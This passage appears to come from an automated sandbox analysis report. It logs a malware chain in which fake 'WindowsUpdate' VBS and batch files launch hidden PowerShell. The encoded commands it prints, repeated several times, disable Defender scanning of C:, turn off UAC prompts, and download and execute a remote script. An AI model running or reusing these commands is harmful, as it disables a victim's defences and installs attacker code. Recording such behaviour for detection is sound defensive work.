XNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_706.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7628 -s 3380
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8000 -s 3228
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_801.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4696 -s 3244
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\system32\wscript.exe" "C:\Users\user\AppData\Roaming\WindowsUpdate_394.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command 